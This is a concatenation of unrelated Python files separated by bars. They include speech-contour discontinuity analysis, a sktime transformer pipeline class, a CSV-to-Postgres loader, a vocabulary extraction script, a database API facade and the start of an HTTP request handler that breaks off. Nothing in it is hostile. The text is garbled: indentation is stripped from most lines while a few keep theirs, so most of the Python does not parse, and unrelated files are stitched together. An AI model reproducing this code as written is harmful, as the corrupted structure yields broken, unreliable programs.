def discont_feat(d,t1,t2,tc,x1,x2,xc,y1,y2,yc,yc1,yc2,ye,cu1,cu2,yu1,yu2,zp):
## reset
d["res"].append(y2[0]-y1[-1])
## y-RMSD between regression lines: 1-pre, 2-post, c-all
d["ry1"].append(myl.rmsd(yc1,y1))
d["ry2"].append(myl.rmsd(yc2,y2))
d["ryc"].append(myl.rmsd(yc,np.concatenate((y1,y2))))
## extrapolation y-RMSD
d["ry2e"].append(myl.rmsd(y2,ye))
## xy-RMSD between regression lines and input values: 1-pre, 2-post, c-all
rx1 = myl.rmsd(yc1,x1)
rx2 = myl.rmsd(yc2,x2)
rxc = myl.rmsd(yc,xc)
d["rx1"].append(rx1)
d["rx2"].append(rx2)
d["rxc"].append(rxc)
## xy-RMSD ratios of joint fit divided by single fits RMSD
# (the higher, the more discontinuity)
d["rr1"].append(myl.robust_div(rx1,myl.rmsd(y1,x1)))
d["rr2"].append(myl.robust_div(rx2,myl.rmsd(y2,x2)))
d["rrc"].append(myl.robust_div(rxc,myl.rmsd(np.concatenate((y1,y2)),xc)))
## rates
d["ra1"].append(drate(t1,y1))
d["ra2"].append(drate(t2,y2))
d["dlt_ra"].append(d["ra2"][-1]-d["ra1"][-1])
## means
d["m1"].append(np.mean(x1))
d["m2"].append(np.mean(x2))
d["dlt_m"].append(d["m2"][-1]-d["m1"][-1])
## variances
d["v1"].append(np.var(x1))
d["v2"].append(np.var(x2))
d["vc"].append(np.var(xc))
d["vr"].append(np.mean([d["v1"][-1],d["v2"][-1]])/d["vc"][-1])
d["dlt_v"].append(d["v2"][-1]-d["v1"][-1])
## shapes
d["s1_c3"].append(cu1[0])
d["s1_c2"].append(cu1[1])
d["s1_c1"].append(cu1[2])
d["s1_c0"].append(cu1[3])
d["s2_c3"].append(cu2[0])
d["s2_c2"].append(cu2[1])
d["s2_c1"].append(cu2[2])
d["s2_c0"].append(cu2[3])
d["eucl_c"].append(myl.dist_eucl(cu1,cu2))
rr = np.corrcoef(cu1,cu2)
d["corr_c"].append(rr[0,1])
d["dlt_c3"].append(d["s2_c3"][-1]-d["s1_c3"][-1])
d["dlt_c2"].append(d["s2_c2"][-1]-d["s1_c2"][-1])
d["dlt_c1"].append(d["s2_c1"][-1]-d["s1_c1"][-1])
d["dlt_c0"].append(d["s2_c0"][-1]-d["s1_c0"][-1])
d["eucl_y"].append(myl.dist_eucl(yu1,yu2))
rry = np.corrcoef(yu1,yu2)
d["corr_y"].append(rry[0,1])
## pause
if zp:
d["p"].append(0)
else:
d["p"].append(t2[0]-t1[-1])
return d
# returns declination rate of y over time t
# IN:
# t: time vector
# y: vector of same length
# OUT:
# r: change in y over time t
def drate(t,y):
if len(t)==0 or len(y)==0:
return np.nan
    # slope: change in y per unit time
    return (y[-1]-y[0])/(t[-1]-t[0])
# indices in t for which to derive discont values
# IN:
# t: all time stamps/indices
# ts: selected time stamps/indices, can be empty, 1-dim or 2-dim
# OUT:
# ii
# ==t-index pairs [[i-1, i]...] for i>=1, if ts empty
# ==index of [[infimum supremum]...] t-elements for ts stamps or intervals, else
# zp
# zero pause; True for 1-dim ts, False for 2-dim
def discont_tsi(t,ts):
ii = []
# return all index pairs [i-1, i]
    if len(ts)==0:
        for i in np.arange(1,len(t)):
            ii = myl.push(ii,[i-1,i])
        # no pause information available -> zero-pause flag
        return ii, True
# zero pause
if myl.of_list_type(ts[0]):
zp = False
else:
zp = True
# return selected index pairs
for x in ts:
# supremum and infimum
if myl.of_list_type(x):
xi, xs = x[0], x[1]
else:
xi, xs = x, x
if xi==xs:
op = '<'
else:
op = '<='
sup = myl.find(t,'>=',xs)
inf = myl.find(t,op,xi)
if len(sup)==0 or len(inf)==0 or sup[0]==0 or inf[-1]==0:
continue
ii.append([inf[-1],sup[0]])
return ii, zp
# preceding, following segment indices around t[i]
# defined by opt[win|l]
# IN:
# t: 1- or 2-dim time array [timeStamp ...] or [[t_off t_on] ...], the latter
# accounting for pauses
# ii: current idx pair in t
# opt: cf discont
# OUT:
# i1, i2: pre/post boundary index arrays
# REMARK:
# i is part of i2
def discont_idx(t,ii,opt):
lx = len(t)
i, j = ii[0], ii[1]
# glob: preceding, following segment from start/till end
if opt['win']=='glob':
return np.arange(0,ii[0]), np.arange(ii[1],lx)
i1 = myl.find_interval(t,[t[i]-opt['l'], t[i]])
i2 = myl.find_interval(t,[t[j], t[j]+opt['l']])
return i1, i2
#### discontinuity analysis: some bugs, use discont() instead
# measures delta and linear fit discontinuities between
# adjacent array elements in terms of:
# - delta
# - reset of regression lines
# - root mean squared deviation between overall regression line and
# -- preceding segment's regression line
# -- following segment's regression line
# IN:
# x: nx2 array [[time val] ...]
# OR
# nx1 array [val ...]
# for the latter indices are taken as time stamps
# OUT:
# d: (n-1)x6 array [[residuum delta reset rms_total rms_pre rms_post] ...]
# d[i,] refers to discontinuity between x[i-1,] and x[i,]
# Example:
# >> import numpy as np
# >> import discont as ds
# >> x = np.random.rand(20)
# >> d = ds.discont(x)
def discont_deprec(x):
do_plot=False
# time: first column or indices
lx = len(x)
if np.ndim(x)==1:
t = np.arange(0,lx)
x = np.asarray(x)
else:
t = x[:,0]
x = x[:,1]
# output
d = np.asarray([])
# overall linear regression
c = myPolyfit(t,x,1)
y = np.polyval(c,t)
if do_plot:
fig = plot_newfig()
plt.plot(t,x,":b",t,y,"-r")
plt.show()
# residuums
resid = x-y
# deltas
ds = np.diff(x)
# linear fits
for i in np.arange(1,lx):
# preceding, following segment
i1, i2 = np.arange(0,i), np.arange(i,lx)
t1, t2, x1, x2 = t[i1], t[i2], x[i1], x[i2]
# linear fit coefs
c1 = myPolyfit(t1,x1,1)
c2 = myPolyfit(t2,x2,1)
# fit values
y1 = np.polyval(c1,t1)
y2 = np.polyval(c2,t2)
# reset
res = y2[0] - y1[-1]
# RMSD: pre, post, all
r1 = myl.rmsd(y[i1],y1)
r2 = myl.rmsd(y[i2],y2)
r12 = myl.rmsd(y,np.concatenate((y1,y2)))
# append to output
d = myl.push(d,[resid[i],ds[i-1],res,r1,r2,r12])
return d
# robust wrapper around polyfit to
# capture too short inputs
# IN:
# x
# y
# o: order <1>
# OUT:
# c: coefs
def myPolyfit(x,y,o=1):
if len(x)==0:
return np.zeros(o+1)
if len(x)<=o:
return myl.push(np.zeros(o),np.mean(y))
return np.polyfit(x,y,o)
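# Illustrative usage sketch, not part of the original module: myPolyfit() falls
# back to a constant fit for degenerate input instead of raising like
# np.polyfit (assuming myl.push appends a value, as it is used elsewhere here).
def _demo_myPolyfit():
    c = myPolyfit(np.array([0., 1., 2.]), np.array([1., 3., 5.]), 1)   # ~[2., 1.]
    c_short = myPolyfit(np.array([1.]), np.array([4.]), 1)             # [0., 4.]
    return c, c_short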
# plot extracted syllable nuclei (can be plotted before pruning, too)
# IN:
# y: energy contour
# idx: ncl indices (in y)
def plot_sylncl(y,idx):
x_dict = {"y": myl.idx(y)}
y_dict = {"y": y}
r = [0,0.15]
opt = {"ls": {"y": "-k"}}
# over locmax idxs
for i in myl.idx(idx):
z = "s{}".format(i)
x_dict[z] = [idx[i], idx[i]]
y_dict[z] = r
opt["ls"][z] = "-b"
myl.myPlot(x_dict,y_dict,opt)
# init new figure with onclick->next, keypress->exit
# OUT:
# figureHandle
def plot_newfig():
fig = plt.figure()
cid1 = fig.canvas.mpl_connect('button_press_event', onclick_next)
cid2 = fig.canvas.mpl_connect('key_press_event', onclick_exit)
return fig
# click on plot -> next one
def onclick_next(event):
plt.close()
# press key -> exit
def onclick_exit(event):
sys.exit()
|
TIME_REGION = [350, 1035, 140, 40] # left, top, width, height
FPS_REGION = [2100, 950, 400, 150] # left, top, width, height
SIMULATION_SPEED = 1.4 # Slower = .6, Slow = .8, Normal = 1, Fast = 1.2, Faster = 1.4
THREADS = 6 # Use as many CPU threads as you have
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
#
from dataclasses import dataclass
@dataclass
class Options:
"""Class for defining Nubia options and settings"""
# File-based history is enabled by default. If this is set to false, we
# fallback to the in-memory history.
persistent_history: bool = True
|
from src.csv_parser import CSVParser
import logging
from src.config import cfg
import src.logger
from itertools import islice
from src.db import Database
import os
import json
from typing import List
from psycopg2.extras import execute_values
import psycopg2
def insert_to_db(rows):
cursor = Database.database_connection.cursor()
tupled_rows = generate_tuple(rows)
insert_sql= """
INSERT INTO covid_data_schema.raw_data
(
data
)
values %s
"""
execute_values(cursor, insert_sql, tupled_rows, page_size=10000,)
pass
def generate_tuple(rows):
# NOTE: Format data into list of tuples for insert query
query_tpl = []
for i in range(0, len(rows)):
tpl = (json.dumps(rows[i]),)
query_tpl.append(tpl)
return query_tpl
def load_csv_data():
Database.create_db_connection()
try:
logging.info("Extracting data from data source")
src_file_path = os.path.join("src", cfg["datasource"]["filename"])
path_check = os.path.exists(src_file_path)
csv_rows = CSVParser.parse_csv_from_file(src_file_path)
batch_size = 1000
logging.info("Inserting values to database")
        while True:
            rows = list(islice(csv_rows, batch_size))
            # stop once the CSV iterator is exhausted; avoids inserting an empty batch
            if len(rows) == 0:
                break
            insert_to_db(rows)
logging.info("Committing DB Actions")
Database.commit_db_actions()
logging.info("Done")
except Exception as e:
Database.rollback_db_actions()
Database.close_db_connection()
raise e
if(__name__ == "__main__"):
load_csv_data()
pass
|
import argparse
import logging
import os
import tensorflow as tf
from nlpvocab import Vocabulary
from .input import RESERVED, vocab_dataset
from .model import _unit_embedder
from .config import VectModel, build_config
def extract_vocab(data_path, config):
dataset = vocab_dataset(data_path, config)
label_vocab = Vocabulary()
for labels in dataset:
label_vocab.update(labels.flat_values.numpy())
label_vocab = Vocabulary({w.decode('utf-8'): f for w, f in label_vocab.most_common()})
    assert 0 == label_vocab[''], 'Empty label occurred'
embedder = _unit_embedder(config, RESERVED)
unit_vocab = embedder.vocab(label_vocab)
return unit_vocab, label_vocab
def _vocab_names(data_path, config, fmt=Vocabulary.FORMAT_BINARY_PICKLE):
model_name = config.vect_model.value
if VectModel.CBOWPOS == config.vect_model:
model_name = VectModel.CBOW.value
ext = 'pkl' if Vocabulary.FORMAT_BINARY_PICKLE == fmt else 'tsv'
unit_vocab = 'vocab_{}_{}_unit.{}'.format(model_name, config.input_unit.value, ext)
label_vocab = 'vocab_{}_{}_label.{}'.format(model_name, config.input_unit.value, ext)
return os.path.join(data_path, unit_vocab), os.path.join(data_path, label_vocab)
def main():
parser = argparse.ArgumentParser(description='Extract vocabulary from dataset')
parser.add_argument(
'hyper_params',
type=argparse.FileType('rb'),
help='YAML-encoded model hyperparameters file')
parser.add_argument(
'data_path',
type=str,
help='Path to train .txt.gz files')
argv, _ = parser.parse_known_args()
assert os.path.exists(argv.data_path) and os.path.isdir(argv.data_path), 'Wrong train dataset path'
tf.get_logger().setLevel(logging.INFO)
params_path = argv.hyper_params.name
argv.hyper_params.close()
config = build_config(params_path)
tf.get_logger().info('Estimating {} and label vocabularies'.format(config.input_unit))
unit_vocab, label_vocab = extract_vocab(argv.data_path, config)
tf.get_logger().info('Saving vocabularies to {}'.format(argv.data_path))
unit_pkl, label_pkl = _vocab_names(argv.data_path, config)
unit_vocab.save(unit_pkl)
label_vocab.save(label_pkl)
unit_tsv, label_tsv = _vocab_names(argv.data_path, config, Vocabulary.FORMAT_TSV_WITH_HEADERS)
unit_vocab.save(unit_tsv, Vocabulary.FORMAT_TSV_WITH_HEADERS)
label_vocab.save(label_tsv, Vocabulary.FORMAT_TSV_WITH_HEADERS)
tf.get_logger().info('Vocabularies saved to {}'.format(argv.data_path))
|
# -*- coding: utf-8 -*-
"""Meta-transformers for building composite transformers."""
# copyright: sktime developers, BSD-3-Clause License (see LICENSE file)
from sklearn.base import clone
from sktime.base import _HeterogenousMetaEstimator
from sktime.transformations.base import BaseTransformer
__author__ = ["fkiraly"]
__all__ = ["TransformerPipeline"]
class TransformerPipeline(BaseTransformer, _HeterogenousMetaEstimator):
"""Pipeline of transformers compositor.
    The `TransformerPipeline` compositor allows chaining of transformers.
The pipeline is constructed with a list of sktime transformers,
i.e., estimators following the BaseTransformer interface.
The list can be unnamed - a simple list of transformers -
or string named - a list of pairs of string, estimator.
For a list of transformers `trafo1`, `trafo2`, ..., `trafoN`,
the pipeline behaves as follows:
`fit` - changes state by running `trafo1.fit_transform`, `trafo2.fit_transform`, etc
sequentially, with `trafo[i]` receiving the output of `trafo[i-1]`
`transform` - result is of executing `trafo1.transform`, `trafo2.transform`, etc
with `trafo[i].transform` input = output of `trafo[i-1].transform`,
and returning the output of `trafoN.transform`
`inverse_transform` - result is of executing `trafo[i].inverse_transform`,
with `trafo[i].inverse_transform` input = output `trafo[i-1].inverse_transform`,
and returning the output of `trafoN.inverse_transform`
`update` - changes state by chaining `trafo1.update`, `trafo1.transform`,
`trafo2.update`, `trafo2.transform`, ..., `trafoN.update`,
where `trafo[i].update` and `trafo[i].transform` receive as input
the output of `trafo[i-1].transform`
`get_params`, `set_params` uses `sklearn` compatible nesting interface
if list is unnamed, names are generated as names of classes
if names are non-unique, `f"_{str(i)}"` is appended to each name string
where `i` is the total count of occurrence of a non-unique string
inside the list of names leading up to it (inclusive)
`TransformerPipeline` can also be created by using the magic multiplication
on any transformer, i.e., any estimator inheriting from `BaseTransformer`
for instance, `my_trafo1 * my_trafo2 * my_trafo3`
will result in the same object as obtained from the constructor
`TransformerPipeline([my_trafo1, my_trafo2, my_trafo3])`
magic multiplication can also be used with (str, transformer) pairs,
as long as one element in the chain is a transformer
Parameters
----------
steps : list of sktime transformers, or
list of tuples (str, transformer) of sktime transformers
these are "blueprint" transformers, states do not change when `fit` is called
Attributes
----------
steps_ : list of tuples (str, transformer) of sktime transformers
clones of transformers in `steps` which are fitted in the pipeline
is always in (str, transformer) format, even if `steps` is just a list
strings not passed in `steps` are replaced by unique generated strings
i-th transformer in `steps_` is clone of i-th in `steps`
Examples
--------
>>> # we'll construct a pipeline from 2 transformers below, in three different ways
>>> # preparing the transformers
>>> from sktime.transformations.series.exponent import ExponentTransformer
>>> t1 = ExponentTransformer(power=2)
>>> t2 = ExponentTransformer(power=0.5)
>>> # Example 1: construct without strings
>>> pipe = TransformerPipeline(steps = [t1, t2])
>>> # unique names are generated for the two components t1 and t2
>>> # Example 2: construct with strings to give custom names to steps
>>> pipe = TransformerPipeline(
... steps = [
... ("trafo1", t1),
... ("trafo2", t2),
... ]
... )
>>> # Example 3: for quick construction, the * dunder method can be used
>>> pipe = t1 * t2
"""
_required_parameters = ["steps"]
# no default tag values - these are set dynamically below
def __init__(self, steps):
self.steps = steps
self.steps_ = self._check_estimators(steps)
super(TransformerPipeline, self).__init__()
first_trafo = self.steps_[0][1]
last_trafo = self.steps_[-1][1]
self.clone_tags(first_trafo, ["X_inner_mtype", "scitype:transform-input"])
self.clone_tags(last_trafo, "scitype:transform-output")
self._anytag_notnone_set("y_inner_mtype")
self._anytag_notnone_set("scitype:transform-labels")
self._anytagis_then_set("scitype:instancewise", False, True)
self._anytagis_then_set("X-y-must-have-same-index", True, False)
self._anytagis_then_set("fit_is_empty", False, True)
self._anytagis_then_set("transform-returns-same-time-index", False, True)
self._anytagis_then_set("skip-inverse-transform", True, False)
self._anytagis_then_set("capability:inverse_transform", False, True)
self._anytagis_then_set("handles-missing-data", False, True)
self._anytagis_then_set("univariate-only", True, False)
@property
def _steps(self):
return self._get_estimator_tuples(self.steps, clone_ests=False)
@_steps.setter
def _steps(self, value):
self.steps = value
def __mul__(self, other):
"""Magic * method, return (right) concatenated TransformerPipeline.
Implemented for `other` being a transformer, otherwise returns `NotImplemented`.
Parameters
----------
other: `sktime` transformer, must inherit from BaseTransformer
otherwise, `NotImplemented` is returned
Returns
-------
TransformerPipeline object, concatenation of `self` (first) with `other` (last).
not nested, contains only non-TransformerPipeline `sktime` transformers
"""
# we don't use names but _get_estimator_names to get the *original* names
# to avoid multiple "make unique" calls which may grow strings too much
_, trafos = zip(*self.steps_)
names = tuple(self._get_estimator_names(self.steps))
if isinstance(other, TransformerPipeline):
_, trafos_o = zip(*other.steps_)
names_o = tuple(other._get_estimator_names(other.steps))
new_names = names + names_o
new_trafos = trafos + trafos_o
elif isinstance(other, BaseTransformer):
new_names = names + (type(other).__name__,)
new_trafos = trafos + (other,)
elif self._is_name_and_trafo(other):
other_name = other[0]
other_trafo = other[1]
new_names = names + (other_name,)
new_trafos = trafos + (other_trafo,)
else:
return NotImplemented
# if all the names are equal to class names, we eat them away
if all(type(x[1]).__name__ == x[0] for x in zip(new_names, new_trafos)):
return TransformerPipeline(steps=list(new_trafos))
else:
return TransformerPipeline(steps=list(zip(new_names, new_trafos)))
def __rmul__(self, other):
"""Magic * method, return (left) concatenated TransformerPipeline.
Implemented for `other` being a transformer, otherwise returns `NotImplemented`.
Parameters
----------
other: `sktime` transformer, must inherit from BaseTransformer
otherwise, `NotImplemented` is returned
Returns
-------
TransformerPipeline object, concatenation of `other` (first) with `self` (last).
not nested, contains only non-TransformerPipeline `sktime` steps
"""
_, trafos = zip(*self.steps_)
names = tuple(self._get_estimator_names(self.steps))
if isinstance(other, TransformerPipeline):
_, trafos_o = zip(*other.steps_)
names_o = tuple(other._get_estimator_names(other.steps))
new_names = names_o + names
new_trafos = trafos_o + trafos
elif isinstance(other, BaseTransformer):
new_names = (type(other).__name__,) + names
new_trafos = (other,) + trafos
elif self._is_name_and_trafo(other):
other_name = other[0]
other_trafo = other[1]
new_names = (other_name,) + names
new_trafos = (other_trafo,) + trafos
else:
return NotImplemented
# if all the names are equal to class names, we eat them away
if all(type(x[1]).__name__ == x[0] for x in zip(new_names, new_trafos)):
return TransformerPipeline(steps=list(new_trafos))
else:
return TransformerPipeline(steps=list(zip(new_names, new_trafos)))
@staticmethod
def _is_name_and_trafo(obj):
if not isinstance(obj, tuple) or len(obj) != 2:
return False
if not isinstance(obj[0], str) or not isinstance(obj[1], BaseTransformer):
return False
return True
def _make_strings_unique(self, strlist):
"""Make a list or tuple of strings unique by appending _int of occurrence."""
# if already unique, just return
if len(set(strlist)) == len(strlist):
return strlist
# we convert internally to list, but remember whether it was tuple
if isinstance(strlist, tuple):
strlist = list(strlist)
was_tuple = True
else:
was_tuple = False
from collections import Counter
strcount = Counter(strlist)
# if any duplicates, we append _integer of occurrence to non-uniques
nowcount = Counter()
uniquestr = strlist
for i, x in enumerate(uniquestr):
if strcount[x] > 1:
nowcount.update([x])
uniquestr[i] = x + "_" + str(nowcount[x])
if was_tuple:
uniquestr = tuple(uniquestr)
# repeat until all are unique
# the algorithm recurses, but will always terminate
# because potential clashes are lexicographically increasing
return self._make_strings_unique(uniquestr)
def _anytagis(self, tag_name, value):
"""Return whether any estimator in list has tag `tag_name` of value `value`."""
tagis = [est.get_tag(tag_name, value) == value for _, est in self.steps_]
return any(tagis)
def _anytagis_then_set(self, tag_name, value, value_if_not):
"""Set self's `tag_name` tag to `value` if any estimator on the list has it."""
if self._anytagis(tag_name=tag_name, value=value):
self.set_tags(**{tag_name: value})
else:
self.set_tags(**{tag_name: value_if_not})
def _anytag_notnone_val(self, tag_name):
"""Return first non-'None' value of tag `tag_name` in estimator list."""
for _, est in self.steps_:
tag_val = est.get_tag(tag_name)
if tag_val != "None":
return tag_val
return tag_val
def _anytag_notnone_set(self, tag_name):
"""Set self's `tag_name` tag to first non-'None' value in estimator list."""
tag_val = self._anytag_notnone_val(tag_name=tag_name)
if tag_val != "None":
self.set_tags(**{tag_name: tag_val})
def _fit(self, X, y=None):
"""Fit transformer to X and y.
private _fit containing the core logic, called from fit
Parameters
----------
X : Series or Panel of mtype X_inner_mtype
if X_inner_mtype is list, _fit must support all types in it
Data to fit transform to
y : Series or Panel of mtype y_inner_mtype, default=None
Additional data, e.g., labels for transformation
Returns
-------
self: reference to self
"""
Xt = X
for _, transformer in self.steps_:
Xt = transformer.fit_transform(X=Xt, y=y)
return self
def _transform(self, X, y=None):
"""Transform X and return a transformed version.
private _transform containing core logic, called from transform
Parameters
----------
X : Series or Panel of mtype X_inner_mtype
if X_inner_mtype is list, _transform must support all types in it
Data to be transformed
y : Series or Panel of mtype y_inner_mtype, default=None
Additional data, e.g., labels for transformation
Returns
-------
transformed version of X
"""
Xt = X
for _, transformer in self.steps_:
if not self.get_tag("fit_is_empty", False):
Xt = transformer.transform(X=Xt, y=y)
else:
Xt = transformer.fit_transform(X=Xt, y=y)
return Xt
def _inverse_transform(self, X, y=None):
"""Inverse transform, inverse operation to transform.
private _inverse_transform containing core logic, called from inverse_transform
Parameters
----------
X : Series or Panel of mtype X_inner_mtype
if X_inner_mtype is list, _inverse_transform must support all types in it
Data to be inverse transformed
y : Series or Panel of mtype y_inner_mtype, optional (default=None)
Additional data, e.g., labels for transformation
Returns
-------
inverse transformed version of X
"""
Xt = X
for _, transformer in self.steps_:
Xt = transformer.inverse_transform(X=Xt, y=y)
return Xt
def _update(self, X, y=None):
"""Update transformer with X and y.
private _update containing the core logic, called from update
Parameters
----------
X : Series or Panel of mtype X_inner_mtype
if X_inner_mtype is list, _update must support all types in it
Data to update transformer with
y : Series or Panel of mtype y_inner_mtype, default=None
            Additional data, e.g., labels for transformation
Returns
-------
self: reference to self
"""
Xt = X
for _, transformer in self.steps_:
transformer.update(X=Xt, y=y)
Xt = transformer.transform(X=Xt, y=y)
return self
def get_params(self, deep=True):
"""Get parameters of estimator in `steps`.
Parameters
----------
deep : boolean, optional
If True, will return the parameters for this estimator and
contained sub-objects that are estimators.
Returns
-------
params : mapping of string to any
Parameter names mapped to their values.
"""
return self._get_params("_steps", deep=deep)
def set_params(self, **kwargs):
"""Set the parameters of estimator in `steps`.
Valid parameter keys can be listed with ``get_params()``.
Returns
-------
self : returns an instance of self.
"""
self._set_params("_steps", **kwargs)
return self
def _check_estimators(self, estimators, attr_name="steps"):
msg = (
f"Invalid '{attr_name}' attribute, '{attr_name}' should be a list"
" of estimators, or a list of (string, estimator) tuples."
)
if (
estimators is None
or len(estimators) == 0
or not isinstance(estimators, list)
):
raise TypeError(msg)
if not isinstance(estimators[0], (BaseTransformer, tuple)):
raise TypeError(msg)
if isinstance(estimators[0], BaseTransformer):
if not all(isinstance(est, BaseTransformer) for est in estimators):
raise TypeError(msg)
if isinstance(estimators[0], tuple):
if not all(isinstance(est, tuple) for est in estimators):
raise TypeError(msg)
if not all(isinstance(est[0], str) for est in estimators):
raise TypeError(msg)
if not all(isinstance(est[1], BaseTransformer) for est in estimators):
raise TypeError(msg)
return self._get_estimator_tuples(estimators, clone_ests=True)
def _get_estimator_list(self, estimators):
"""Return list of estimators, from a list or tuple.
Arguments
---------
estimators : list of estimators, or list of (str, estimator tuples)
Returns
-------
list of estimators - identical with estimators if list of estimators
if list of (str, estimator) tuples, the str get removed
"""
if isinstance(estimators[0], tuple):
return [x[1] for x in estimators]
else:
return estimators
def _get_estimator_names(self, estimators, make_unique=False):
"""Return names for the estimators, optionally made unique.
Arguments
---------
estimators : list of estimators, or list of (str, estimator tuples)
make_unique : bool, optional, default=False
whether names should be made unique in the return
Returns
-------
names : list of str, unique entries, of equal length as estimators
names for estimators in estimators
if make_unique=True, made unique using _make_strings_unique
"""
if estimators is None or len(estimators) == 0:
names = []
elif isinstance(estimators[0], tuple):
names = [x[0] for x in estimators]
elif isinstance(estimators[0], BaseTransformer):
names = [type(e).__name__ for e in estimators]
else:
raise RuntimeError(
"unreachable condition in _get_estimator_names, "
" likely input assumptions are violated,"
" run _check_estimators before running _get_estimator_names"
)
if make_unique:
names = self._make_strings_unique(names)
return names
def _get_estimator_tuples(self, estimators, clone_ests=False):
"""Return list of estimator tuples, from a list or tuple.
Arguments
---------
estimators : list of estimators, or list of (str, estimator tuples)
clone_ests : bool, whether estimators get cloned in the process
Returns
-------
est_tuples : list of (str, estimator) tuples
if estimators was a list of (str, estimator) tuples, then identical/cloned
            if was a list of estimators, then str are generated via _get_estimator_names
"""
ests = self._get_estimator_list(estimators)
if clone_ests:
ests = [clone(e) for e in ests]
unique_names = self._get_estimator_names(estimators, make_unique=True)
est_tuples = list(zip(unique_names, ests))
return est_tuples
@classmethod
def get_test_params(cls):
"""Return testing parameter settings for the estimator.
Returns
-------
params : dict or list of dict, default={}
Parameters to create testing instances of the class.
Each dict are parameters to construct an "interesting" test instance, i.e.,
`MyClass(**params)` or `MyClass(**params[i])` creates a valid test instance.
`create_test_instance` uses the first (or only) dictionary in `params`.
"""
# imports
from sktime.transformations.series.exponent import ExponentTransformer
t1 = ExponentTransformer(power=2)
t2 = ExponentTransformer(power=0.5)
t3 = ExponentTransformer(power=1)
# construct without names
params1 = {"steps": [t1, t2]}
# construct with names
params2 = {"steps": [("foo", t1), ("bar", t2), ("foobar", t3)]}
# construct with names and provoke multiple naming clashes
params3 = {"steps": [("foo", t1), ("foo", t2), ("foo_1", t3)]}
return [params1, params2, params3]
|
from oslo_config import cfg
from hsm import flags
from hsm import utils
db_opts = [
cfg.StrOpt('db_backend',
default='sqlalchemy',
help='The backend to use for db'),
cfg.BoolOpt('enable_new_services',
default=True,
help='Services to be added to the available pool on create')]
FLAGS = flags.FLAGS
FLAGS.register_opts(db_opts)
IMPL = utils.LazyPluggable('db_backend',
sqlalchemy='hsm.db.sqlalchemy.api')
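# IMPL resolves lazily: on first use it imports the backend module selected by
# the 'db_backend' option (here 'sqlalchemy' -> 'hsm.db.sqlalchemy.api'), and
# each wrapper below forwards to the same-named function of that backend.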
####################
# Service
####################
def service_destroy(context, service_id):
"""Destroy the service or raise if it does not exist."""
return IMPL.service_destroy(context, service_id)
def service_get(context, service_id):
"""Get a service or raise if it does not exist."""
return IMPL.service_get(context, service_id)
def service_get_all(context, disabled=None):
"""Get all services."""
return IMPL.service_get_all(context, disabled)
def service_get_all_by_topic(context, topic):
"""Get all services for a given topic."""
return IMPL.service_get_all_by_topic(context, topic)
def service_get_by_args(context, host, binary):
"""Get the state of an service by node name and binary."""
return IMPL.service_get_by_args(context, host, binary)
def service_create(context, values):
"""Create a service from the values dictionary."""
return IMPL.service_create(context, values)
def service_update(context, service_id, values):
"""Set the given properties on an service and update it.
Raises NotFound if service does not exist.
"""
return IMPL.service_update(context, service_id, values)
####################
# Server
####################
def server_create(context, values):
"""Create a new server."""
return IMPL.server_create(context, values)
def server_get_by_host(context, host):
"""Get a server by name."""
return IMPL.server_get_by_host(context, host)
def server_update(context, server_id, values):
"""Update a server by server id."""
return IMPL.server_update(context, server_id, values)
def server_get_all(context):
"""Get a list of servers."""
return IMPL.server_get_all(context)
def server_get(context, server_id):
"""Get a detail info of a server by id."""
return IMPL.server_get(context, server_id)
####################
# Hs_Instance
####################
def hs_instance_create(context, values):
"""Create a new hyperstash instance."""
return IMPL.hs_instance_create(context, values)
def hs_instance_get_all(context):
"""Get a list of hyperstash instances."""
return IMPL.hs_instance_get_all(context)
def hs_instance_get(context, hs_instance_id):
"""Get a detail info of a hyperstash instance by id."""
return IMPL.hs_instance_get(context, hs_instance_id)
def hs_instance_delete(context, hs_instance_id):
"""Delete the hyperstash instance from the db."""
return IMPL.hs_instance_delete(context, hs_instance_id)
def hs_instance_get_by_host(context, host):
"""Get a detail info of a hyperstash instance by host."""
return IMPL.hs_instance_get_by_host(context, host)
####################
# RBD
####################
def rbd_create(context, values):
"""Create a new rbd info into db."""
return IMPL.rbd_create(context, values)
def rbd_get_all_by_hs_instance_id(context, hs_instance_id):
"""Get a list of rbds by hyperstash instance id."""
return IMPL.rbd_get_all_by_hs_instance_id(context, hs_instance_id)
def rbd_delete(context, rbd_id):
"""Delete the rbd from the db."""
return IMPL.rbd_delete(context, rbd_id)
def rbd_get_all(context):
"""Get a list of rbds."""
return IMPL.rbd_get_all(context)
def rbd_get(context, rbd_id):
"""Get a detail info of a rbd by id."""
return IMPL.rbd_get(context, rbd_id)
def rbd_get_by_name(context, name):
"""Get a detail info of a rbd by name."""
return IMPL.rbd_get_by_name(context, name)
def rbd_update(context, rbd_id, values):
"""Update a rbd by rbd id."""
return IMPL.rbd_update(context, rbd_id, values)
####################
# Performance Metric
####################
def performance_metric_get_by_rbd_name(context, rbd_name):
"""Get values by rbd name."""
return IMPL.performance_metric_get_by_rbd_name(context, rbd_name)
####################
# RBD Cache Config
####################
def rbd_cache_config_get_all(context):
"""Get a list of rbd cache configs."""
return IMPL.rbd_cache_config_get_all(context)
def rbd_cache_config_get(context, rbd_cache_config_id):
"""Get a detail info of a rbd cache config by id."""
return IMPL.rbd_cache_config_get(context, rbd_cache_config_id)
def rbd_cache_config_get_by_rbd_id(context, rbd_id):
"""Get a detail info of a rbd cache config by rbd id."""
return IMPL.rbd_cache_config_get_by_rbd_id(context, rbd_id)
def rbd_cache_config_create(context, values):
"""Create a new rbd cache config into db."""
return IMPL.rbd_cache_config_create(context, values)
def rbd_cache_config_delete_by_rbd_id(context, rbd_id):
"""Delete a rbd cache config by rbd id."""
return IMPL.rbd_cache_config_delete_by_rbd_id(context, rbd_id)
def rbd_cache_config_update(context, rbd_cache_config_id, values):
"""Update a rbd cache config by id."""
return IMPL.rbd_cache_config_update(context, rbd_cache_config_id, values)
####################
# Periodic Task
####################
def performance_metric_clean_up_data(context, seconds):
IMPL.performance_metric_clean_up_data(context, seconds)
|
import Config
import http.server
import json
import os
import time
import urllib.parse
from pymongo import cursor
class REST(http.server.BaseHTTPRequestHandler):
"""
The RequestHandler-class gets instantiated once per HTTP-request and handles it.
Every HTTP-request is passed to the related HTTP Method handler.
A GET-Request gets passed to the do_GET-method, and so on.
Then the url and headers are parsed and the related interface-function called
with the extracted parameters.
"""
#HTTP-METHOD-HANDLERS
def do_GET(self):
self._set_session()
parsed = urllib.parse.urlparse(self.path)
path = parsed[2]
query = self._remove_array(urllib.parse.parse_qs(parsed[4]))
self._handle_path(path, query)
